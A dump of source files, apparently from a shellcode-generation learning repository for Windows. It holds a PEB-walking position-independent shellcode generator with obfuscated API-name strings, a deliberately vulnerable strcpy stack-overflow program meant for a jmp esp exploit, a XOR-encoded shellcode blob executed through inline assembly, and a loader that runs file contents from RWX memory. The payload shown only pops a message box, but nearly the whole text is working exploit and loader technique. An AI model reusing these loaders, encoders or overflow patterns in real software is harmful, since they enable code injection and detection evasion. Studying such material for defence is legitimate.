 27 | 	wchar_t struser32[] = { L'u', L's', L'e', L'r', L'3',L'2', L'.', L'd', L'l', L'l', 0 };
 28 | 	char MeassageboxA_api[] = { 'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0 };
 29 | 
 30 | 	HANDLE hKernel32 = GetKernel32Handle();
 31 | 	if (hKernel32 == INVALID_HANDLE_VALUE) {
 32 | 		return;
 33 | 	}
 34 | 	LPBYTE lpBaseAddr = (LPBYTE)hKernel32;
 35 | 	PIMAGE_DOS_HEADER lpDosHdr = (PIMAGE_DOS_HEADER)lpBaseAddr;
 36 | 	PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)(lpBaseAddr + lpDosHdr->e_lfanew);
 37 | 	PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)(lpBaseAddr + pNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
 38 | 
 39 | 	LPDWORD pNameArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfNames);
 40 | 	LPDWORD pAddrArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfFunctions);
 41 | 	LPWORD pOrdArray = (LPWORD)(lpBaseAddr + pExportDir->AddressOfNameOrdinals);
 42 | 	CHAR strLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0x0 };
 43 | 	CHAR strGetProcAddress[] = { 'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0x0 };
 44 | 
 45 | 	for (UINT i = 0; i < pExportDir->NumberOfNames; i++) {
 46 | 		LPSTR pFuncName = (LPSTR)(lpBaseAddr + pNameArray[i]);
 47 | 		if (!__STRCMPI__(pFuncName, strGetProcAddress)) {
 48 | 			getprocaddressapi=(GetProcAddressAPI)(lpBaseAddr + pAddrArray[pOrdArray[i]]);
 49 | 		}
 50 | 		else if (!__STRCMPI__(pFuncName, strLoadLibraryA)) {
 51 | 			loadlibrarywapi=(LoadLibraryWAPI) (lpBaseAddr + pAddrArray[pOrdArray[i]]);
 52 | 		}
 53 | 		if (getprocaddressapi != nullptr && loadlibrarywapi != nullptr) {				
 54 | 			messageboxapi=(MESSAGEBOXAPI)getprocaddressapi(loadlibrarywapi(struser32), MeassageboxA_api);
 55 | 			messageboxapi(NULL, NULL, NULL, 0);
 56 | 			return;
 57 | 		}
 58 | 	}
 59 | }
 60 | 
 61 | inline BOOL __ISUPPER__(__in CHAR c) {
 62 | 	return ('A' <= c) && (c <= 'Z');
 63 | };
 64 | inline CHAR __TOLOWER__(__in CHAR c) {
 65 | 	return __ISUPPER__(c) ? c - 'A' + 'a' : c;
 66 | };
 67 | 
 68 | UINT __STRLEN__(__in LPSTR lpStr1)
 69 | {
 70 | 	UINT i = 0;
 71 | 	while (lpStr1[i] != 0x0)
 72 | 		i++;
 73 | 	return i;
 74 | }
 75 | 
 76 | UINT __STRLENW__(__in LPWSTR lpStr1)
 77 | {
 78 | 	UINT i = 0;
 79 | 	while (lpStr1[i] != L'\0')
 80 | 		i++;
 81 | 	return i;
 82 | }
 83 | 
 84 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2)
 85 | {
 86 | 	CHAR c = __TOLOWER__(((PCHAR)(lpStr2++))[0]);
 87 | 	if (!c)
 88 | 		return lpStr1;
 89 | 	UINT dwLen = __STRLENW__(lpStr2);
 90 | 	do
 91 | 	{
 92 | 		CHAR sc;
 93 | 		do
 94 | 		{
 95 | 			sc = __TOLOWER__(((PCHAR)(lpStr1)++)[0]);
 96 | 			if (!sc)
 97 | 				return NULL;
 98 | 		} while (sc != c);
 99 | 	} while (__STRNCMPIW__(lpStr1, lpStr2, dwLen) != 0);
100 | 	return (lpStr1 - 1); // FIXME -2 ?
101 | }
102 | 
103 | INT __STRCMPI__(
104 | 	__in LPSTR lpStr1,
105 | 	__in LPSTR lpStr2)
106 | {
107 | 	int  v;
108 | 	CHAR c1, c2;
109 | 	do
110 | 	{
111 | 		c1 = *lpStr1++;
112 | 		c2 = *lpStr2++;
113 | 		// The casts are necessary when pStr1 is shorter & char is signed 
114 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
115 | 	} while ((v == 0) && (c1 != '\0') && (c2 != '\0'));
116 | 	return v;
117 | }
118 | 
119 | INT __STRNCMPIW__(
120 | 	__in LPWSTR lpStr1,
121 | 	__in LPWSTR lpStr2,
122 | 	__in DWORD dwLen)
123 | {
124 | 	int  v;
125 | 	CHAR c1, c2;
126 | 	do {
127 | 		dwLen--;
128 | 		c1 = ((PCHAR)lpStr1++)[0];
129 | 		c2 = ((PCHAR)lpStr2++)[0];
130 | 		/* The casts are necessary when pStr1 is shorter & char is signed */
131 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
132 | 	} while ((v == 0) && (c1 != 0x0) && (c2 != 0x0) && dwLen > 0);
133 | 	return v;
134 | }
135 | 
136 | LPSTR __STRCAT__(
137 | 	__in LPSTR	strDest,
138 | 	__in LPSTR strSource)
139 | {
140 | 	LPSTR d = strDest;
141 | 	LPSTR s = strSource;
142 | 	while (*d) d++;
143 | 	do { *d++ = *s++; } while (*s);
144 | 	*d = 0x0;
145 | 	return strDest;
146 | }
147 | 
148 | LPVOID __MEMCPY__(
149 | 	__in LPVOID lpDst,
150 | 	__in LPVOID lpSrc,
151 | 	__in DWORD dwCount)
152 | {
153 | 	LPBYTE s = (LPBYTE)lpSrc;
154 | 	LPBYTE d = (LPBYTE)lpDst;
155 | 	while (dwCount--)
156 | 		*d++ = *s++;
157 | 	return lpDst;
158 | }
159 | 
160 | HANDLE GetKernel32Handle() {
161 | 	HANDLE hKernel32 = INVALID_HANDLE_VALUE;
162 | #ifdef _WIN64
163 | 	PPEB lpPeb = (PPEB)__readgsqword(0x60);
164 | #else
165 | 	PPEB lpPeb = (PPEB)__readfsdword(0x30);
166 | #endif
167 | 	PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
168 | 	PLIST_ENTRY pListEntry = pListHead->Flink;
169 | 	WCHAR strDllName[MAX_PATH];
170 | 	WCHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', L'\0' };
171 | 
172 | 	while (pListEntry != pListHead) {
173 | 		PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
174 | 		if (pModEntry->FullDllName.Length) {
175 | 			DWORD dwLen = pModEntry->FullDllName.Length;
176 | 			__MEMCPY__(strDllName, pModEntry->FullDllName.Buffer, dwLen);
177 | 			strDllName[dwLen / sizeof(WCHAR)] = L'\0';
178 | 			if (__STRSTRIW__(strDllName, strKernel32)) {
179 | 				hKernel32 = pModEntry->DllBase;
180 | 				break;
181 | 			}
182 | 		}
183 | 		pListEntry = pListEntry->Flink;
184 | 	}
185 | 	return hKernel32;
186 | }
187 | 
188 | int main()
189 | {
190 | 	printf("1");
191 | 	shell_code();
192 | 	printf("2");
193 | 	return 0;
194 | }
195 | 


--------------------------------------------------------------------------------
/stackoverflowExample(jmpesp).cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <windows.h>
 3 | #define PASSWORD "1234567"
 4 | 
 5 | int verify_password (char *password)
 6 | {
 7 | 	int authenticated;
 8 | 	char buffer[44];
 9 | 	authenticated=strcmp(password,PASSWORD);
10 | 	strcpy(buffer,password);
11 | 	return authenticated;
12 | }
13 | 
14 | 
15 | int main()
16 | {
17 | 	int valid_flag=0;
18 | 	char password[2048];
19 | 	FILE *fp;
20 | 	LoadLibrary("user32.dll");
21 | 	if(!(fp=fopen("shellcode2.bin","rb")))
22 | 		return 0;
23 | 	fread(password,1627,1,fp);
24 | 	valid_flag=verify_password(password);
25 | 
26 | 
27 | 	if(valid_flag)
28 | 	{
29 | 		printf("wrong\n");
30 | 	}
31 | 	else
32 | 	{
33 | 		printf("right\n");
34 | 	}
35 | 	fclose(fp);
36 | 
37 | 
38 | 	return 0;
39 | }
40 | 
41 | 


--------------------------------------------------------------------------------
/stackoverflowshellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/3gstudent/Shellcode-Generater/ca992ef1a5493e908bce18327c3efc1aeeb4c5f4/stackoverflowshellcode.bin


--------------------------------------------------------------------------------
/testenshellcode.cpp:
--------------------------------------------------------------------------------
  1 | int main(int argc, char* argv[])
  2 | {
  3 | char shellcode[]=
  4 | "\x83\xc0\x14\x33\xc9\x8a\x1c\x08\x80\xf3\x44\x88\x1c\x08\x41\x80"
  5 | "\xfb\x91\x75\xf1\x11\xcf\xa8\xc7\xa8\x3c\x83\x01\xb4\x44\x44\x44"
  6 | "\x44\x83\x01\xa8\x44\x44\x44\x44\x83\x01\x9c\x44\x44\x44\x44\xfc"
  7 | "\x31\x44\x44\x44\x22\xcd\x01\xcc\xfd\x37\x44\x44\x44\x22\xcd\x09"
  8 | "\xce\xfe\x21\x44\x44\x44\x22\xcd\x11\xc8\xfc\x36\x44\x44\x44\x22"
  9 | "\xcd\x01\xca\xfd\x77\x44\x44\x44\x22\xcd\x09\xd4\xfe\x76\x44\x44"
 10 | "\x44\x22\xcd\x11\xd6\xfc\x6a\x44\x44\x44\x22\xcd\x01\xd0\xfd\x20"
 11 | "\x44\x44\x44\x22\xcd\x09\xd2\xfe\x28\x44\x44\x44\x22\xcd\x11\xdc"
 12 | "\xfc\x28\x44\x44\x44\x22\xcd\x01\xde\x77\x8d\x22\xcd\x09\xd8\x82"
 13 | "\x01\x84\x09\x82\x01\x85\x21\x82\x01\x86\x37\x82\x01\x87\x37\x82"
 14 | "\x01\x80\x25\x82\x01\x81\x23\x82\x01\x82\x21\x82\x01\x83\x06\x82"
 15 | "\x01\x8c\x2b\x82\x01\x8d\x3c\x82\x01\x8e\x05\x82\x01\x8f\x44\xac"
 16 | "\x64\x40\x44\x44\xcd\x01\xac\xc7\x39\xac\xbb\x31\x41\xad\x33\x45"
 17 | "\x44\x44\xcf\x11\xac\xcd\x11\xb8\xcf\x01\xb8\xcd\x01\x90\xcf\x09"
 18 | "\x90\xcf\x11\xb8\x47\x15\x78\xcd\x11\x94\xfc\x4c\x44\x44\x44\x2f"
 19 | "\x84\x44\xcf\x09\x94\xcf\x11\xb8\x47\x10\x45\x3c\xcd\x11\xb0\xcf"
 20 | "\x01\xb0\xcf\x09\xb8\x47\x0c\x64\xcd\x09\x88\xcf\x11\xb0\xcf\x01"
 21 | "\xb8\x47\x06\x58\xcd\x01\x98\xcf\x09\xb0\xcf\x11\xb8\x47\x15\x60"
 22 | "\xcd\x11\xa4\x82\x01\xf4\x08\x82\x01\xf5\x2b\x82\x01\xf6\x25\x82"
 23 | "\x01\xf7\x20\x82\x01\xf0\x08\x82\x01\xf1\x2d\x82\x01\xf2\x26\x82"
 24 | "\x01\xf3\x36\x82\x01\xfc\x25\x82\x01\xfd\x36\x82\x01\xfe\x3d\x82"
 25 | "\x01\xff\x13\x82\x01\xf8\x44\x82\x01\xe4\x03\x82\x01\xe5\x21\x82"
 26 | "\x01\xe6\x30\x82\x01\xe7\x14\x82\x01\xe0\x36\x82\x01\xe1\x2b\x82"
 27 | "\x01\xe2\x27\x82\x01\xe3\x05\x82\x01\xec\x20\x82\x01\xed\x20\x82"
 28 | "\x01\xee\x36\x82\x01\xef\x21\x82\x01\xe8\x37\x82\x01\xe9\x37\x82"
 29 | "\x01\xea\x44\x83\x01\xbc\x44\x44\x44\x44\xaf\x4d\xcf\x01\xbc\xc7"
 30 | "\x84\x45\xcd\x01\xbc\xcf\x09\xb0\xcf\x11\xbc\x7f\x15\x5c\x4b\xc7"
 31 | "\xd1\x44\x44\x44\xcf\x01\xbc\xcf\x09\x88\xcf\x11\xb8\x47\x50\xc5"
 32 | "\xcd\x11\xa0\xc9\x01\xe4\x14\xcf\x09\xa0\x15\xac\x80\x45\x44\x44"
 33 | "\xc7\x80\x4c\xc1\x84\x31\x5c\xcf\x11\xbc\xcf\x01\xa4\x4b\xf3\x48"
 34 | "\x14\xcf\x11\x98\xcf\x01\xb8\x47\x40\xce\xcd\x01\xa8\xaf\x6e\xc9"
 35 | "\x09\xf4\x15\xcf\x11\xa0\x16\xac\xdc\x45\x44\x44\xc7\x80\x4c\xc1"
 36 | "\x84\x31\x52\xcf\x01\xbc\xcf\x09\xa4\x4b\xf3\x50\x05\xcf\x01\x98"
 37 | "\xcf\x09\xb8\x47\x48\xd4\xcd\x09\xb4\xc7\x39\xa8\x44\x30\x61\xc7"
 38 | "\x39\xb4\x44\x30\x5b\xc9\x11\x84\x16\xc9\x01\xcc\x14\xbb\x11\xb4"
 39 | "\x14\xbb\x11\xa8\xcd\x01\x9c\x2e\x44\x2e\x44\x2e\x44\x2e\x44\xbb"
 40 | "\x11\x9c\xaf\x41\xad\x17\xbb\xbb\xbb\xcf\xa1\x19\x87\x88\x88\x88"
 41 | "\x88\x88\x88\x88\x11\xcf\xa8\x15\x4b\xfa\x01\x4c\xc7\xbc\x05\x38"
 42 | "\x56\x4b\xfa\x09\x4c\xc7\xbd\x1e\x3b\x4d\x83\x01\xb8\x45\x44\x44"
 43 | "\x44\xaf\x43\x83\x01\xb8\x44\x44\x44\x44\xcf\x01\xb8\xcf\xa1\x19"
 44 | "\x87\x88\x88\x88\x11\xcf\xa8\x15\x4b\xf2\x01\x4c\x14\xac\x86\xbb"
 45 | "\xbb\xbb\xc7\x80\x40\xc1\x84\x30\x48\x4b\xfa\x09\x4c\xc7\x85\x64"
 46 | "\xcd\x09\xb8\xaf\x43\x4b\xfa\x11\x4c\xcd\x11\xb8\xce\x01\xb8\xcf"
 47 | "\xa1\x19\x87\x88\x11\xcf\xa8\x15\x83\x01\xb8\x44\x44\x44\x44\xcf"
 48 | "\x01\xb8\xcf\x09\x4c\x4b\xf3\x50\x05\xc1\x96\x30\x4f\xcf\x01\xb8"
 49 | "\xc7\x84\x45\xcd\x01\xb8\xaf\xa3\xcf\x01\xb8\xcf\xa1\x19\x87\x88"
 50 | "\x88\x88\x88\x88\x11\xcf\xa8\xc7\xa8\x4c\xfc\x45\x44\x44\x44\x2f"
 51 | "\x84\x44\xcf\x09\x48\xce\x50\x45\xcc\x11\xb9\x4b\xf2\x01\xb9\x14"
 52 | "\xac\x3b\xbb\xbb\xbb\xc7\x80\x40\xcc\x01\xba\xcf\x09\x48\xc7\x85"
 53 | "\x46\xcd\x09\x48\x4b\xfa\x11\xba\xc1\x96\x31\x41\xcf\x01\x4c\xaf"
 54 | "\x2b\xcf\x01\x48\x14\xac\xce\xbb\xbb\xbb\xc7\x80\x40\xcd\x01\xbc"
 55 | "\xfd\x45\x44\x44\x44\x2f\x8d\x44\xcf\x11\x4c\xce\x40\x4e\xcc\x01"
 56 | "\xb8\x4b\xf2\x09\xb8\x15\xac\x7d\xbb\xbb\xbb\xc7\x80\x40\xcc\x01"
 57 | "\xbb\xcf\x11\x4c\xc7\x86\x46\xcd\x11\x4c\x4b\xfa\x01\xbb\xc1\x84"
 58 | "\x31\x40\x77\x84\xaf\x6e\x4b\xfa\x09\xbb\x4b\xfa\x11\xba\x7f\x8e"
 59 | "\x31\xfa\xcf\x01\xbc\x14\xcf\x09\x48\x15\xcf\x11\x4c\x16\xac\xc5"
 60 | "\x44\x44\x44\xc7\x80\x48\xc1\x84\x31\xe2\xcf\x01\x4c\xc7\xac\x46"
 61 | "\xcf\xa1\x19\x87\x11\xcf\xa8\xc7\xa8\x4c\x12\xcf\x01\x4c\xce\x4c"
 62 | "\xcc\x09\xbb\xcf\x11\x4c\xc7\x86\x45\xcd\x11\x4c\xcf\x01\x48\xce"
 63 | "\x4c\xcc\x09\xba\xcf\x11\x48\xc7\x86\x45\xcd\x11\x48\x4b\xf2\x01"
 64 | "\xbb\x14\xac\xf9\xba\xbb\xbb\xc7\x80\x40\x4b\xfa\xb4\x4b\xf2\x09"
 65 | "\xba\x15\xac\xe9\xba\xbb\xbb\xc7\x80\x40\x4b\xfa\x94\x6f\xb6\xcd"
 66 | "\x31\xbc\x31\x54\x4b\xfa\x01\xbb\xc1\x84\x30\x4c\x4b\xfa\x09\xba"
 67 | "\xc1\x8d\x31\xe3\xcf\x01\xbc\x1a\xcf\xa1\x19\x87\x88\x88\x88\x88"
 68 | "\x88\x88\x88\x88\x11\xcf\xa8\xc7\xa8\x4c\x12\xcf\x01\x54\xc7\xac"
 69 | "\x45\xcd\x01\x54\xfd\x45\x44\x44\x44\x2f\x8d\x44\xcf\x11\x4c\xce"
 70 | "\x40\x4e\xcc\x01\xbb\xcf\x09\x4c\xc7\x85\x46\xcd\x09\x4c\xfe\x45"
 71 | "\x44\x44\x44\x2f\x96\x44\xcf\x01\x48\xce\x48\x54\xcc\x09\xba\xcf"
 72 | "\x11\x48\xc7\x86\x46\xcd\x11\x48\x4b\xf2\x01\xbb\x14\xac\x76\xba"
 73 | "\xbb\xbb\xc7\x80\x40\x4b\xfa\xb4\x4b\xf2\x09\xba\x15\xac\x66\xba"
 74 | "\xbb\xbb\xc7\x80\x40\x4b\xfa\x94\x6f\xb6\xcd\x31\xbc\x31\x52\x4b"
 75 | "\xfa\x01\xbb\xc1\x84\x30\x4a\x4b\xfa\x09\xba\xc1\x8d\x30\x42\xc7"
 76 | "\x39\x54\x44\x33\xc2\xcf\x01\xbc\x1a\xcf\xa1\x19\x87\x88\x88\x88"
 77 | "\x88\x88\x88\x88\x11\xcf\xa8\xc7\xa8\x48\xcf\x01\x48\xcd\x01\xbc"
 78 | "\xcf\x09\x4c\xcd\x09\xb8\xcf\x11\x54\xcd\x11\xb0\xcf\x01\x54\xc7"
 79 | "\xac\x45\xcd\x01\x54\xc7\x39\xb0\x44\x30\x5a\xcf\x09\xb8\xcf\x11"
 80 | "\xbc\xce\x46\xcc\x45\xcf\x09\xb8\xc7\x85\x45\xcd\x09\xb8\xcf\x11"
 81 | "\xbc\xc7\x86\x45\xcd\x11\xbc\xaf\x89\xcf\x01\x4c\xcf\xa1\x19\x87"
 82 | "\x88\x88\x88\x88\x11\xcf\xa8\xc5\xa8\x78\x46\x44\x44\x83\x01\xb4"
 83 | "\xbb\xbb\xbb\xbb\x20\xe5\x74\x44\x44\x44\xcd\x01\x88\xcf\x09\x88"
 84 | "\xcf\x15\x48\xc7\x86\x50\xcd\x11\xa8\xcf\x01\xa8\xcf\x4c\xcd\x09"
 85 | "\xbc\xfe\x2f\x44\x44\x44\x22\xcd\x11\x94\xfc\x21\x44\x44\x44\x22"
 86 | "\xcd\x01\x96\xfd\x36\x44\x44\x44\x22\xcd\x09\x90\xfe\x2a\x44\x44"
 87 | "\x44\x22\xcd\x11\x92\xfc\x21\x44\x44\x44\x22\xcd\x01\x9c\xfd\x28"
 88 | "\x44\x44\x44\x22\xcd\x09\x9e\xfe\x77\x44\x44\x44\x22\xcd\x11\x98"
 89 | "\xfc\x76\x44\x44\x44\x22\xcd\x01\x9a\xfd\x6a\x44\x44\x44\x22\xcd"
 90 | "\x09\xa4\xfe\x20\x44\x44\x44\x22\xcd\x11\xa6\xfc\x28\x44\x44\x44"
 91 | "\x22\xcd\x01\xa0\xfd\x28\x44\x44\x44\x22\xcd\x09\xa2\x77\x96\x22"
 92 | "\xcd\x11\xac\xcf\x01\xbc\x7f\x01\xa8\x30\x37\xcf\x09\xbc\xc7\xad"
 93 | "\x4c\xcd\x09\xb8\xcf\x11\xb8\x4b\xf3\x06\x60\xc1\x84\x30\x11\xcf"
 94 | "\x09\xb8\x4b\xf3\x15\x60\xcd\x11\xb0\xcf\x01\xb0\x14\xcf\x09\xb8"
 95 | "\xcf\x15\x6c\x16\xc9\xc1\x80\xb9\xbb\xbb\x14\xac\x90\xba\xbb\xbb"
 96 | "\xc7\x80\x48\xcf\x09\xb0\x95\xad\x77\x96\x22\xcd\xd0\x09\x80\xb9"
 97 | "\xbb\xbb\xc9\x01\x94\x14\xc9\xc9\x80\xb9\xbb\xbb\x15\xac\x46\xb9"
 98 | "\xbb\xbb\xc7\x80\x4c\xc1\x84\x30\x4f\xcf\x11\xb8\xcf\x06\x5c\xcd"
 99 | "\x01\xb4\xaf\x4e\xcf\x09\xbc\xcf\x55\xcd\x11\xbc\xaf\xc1\xcf\x01"
100 | "\xb4\xcf\xa1\x19\x87\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88"
101 | "\x88\x88\x88\x88\xd5";
102 | 
103 | 	printf("1");
104 | 	__asm
105 | 	{
106 | 		lea eax,shellcode
107 | 		push eax
108 | 		ret
109 | 	}
110 | 	return 0;
111 | }
112 | 


--------------------------------------------------------------------------------
/testshellcode.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | size_t GetSize(char * szFilePath)
 3 | {
 4 | 	size_t size;
 5 | 	FILE* f = fopen(szFilePath, "rb");
 6 | 	fseek(f, 0, SEEK_END);
 7 | 	size = ftell(f);
 8 | 	rewind(f);
 9 | 	fclose(f);
10 | 	return size;
11 | }
12 | unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
13 | {
14 | 	unsigned char *p = NULL;
15 | 	FILE* f = NULL;
16 | 	size_t res = 0;
17 | 	*size = GetSize(szFilePath);
18 | 	if (*size == 0) return NULL;		
19 | 	f = fopen(szFilePath, "rb");
20 | 	if (f == NULL)
21 | 	{
22 | 		printf("Binary file does not exists!\n");
23 | 		return 0;
24 | 	}
25 | 	p = new unsigned char[*size];
26 | 	rewind(f);
27 | 	res = fread(p, sizeof(unsigned char), *size, f);
28 | 	fclose(f);
29 | 	if (res == 0)
30 | 	{
31 | 		delete[] p;
32 | 		return NULL;
33 | 	}
34 | 	return p;
35 | }
36 | int main(int argc, char* argv[])
37 | {
38 | 	char *szFilePath="c:\\test\\shellcode.bin";
39 | 	unsigned char *BinData = NULL;
40 | 	size_t size = 0;	
41 | 	BinData = ReadBinaryFile(szFilePath, &size);
42 | 	void *sc = VirtualAlloc(0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43 | 	if (sc == NULL)	
44 | 		return 0;	
45 | 	memcpy(sc, BinData, size);
46 | 	(*(int(*)()) sc)();	
47 | 	return 0;
48 | }
49 | 


--------------------------------------------------------------------------------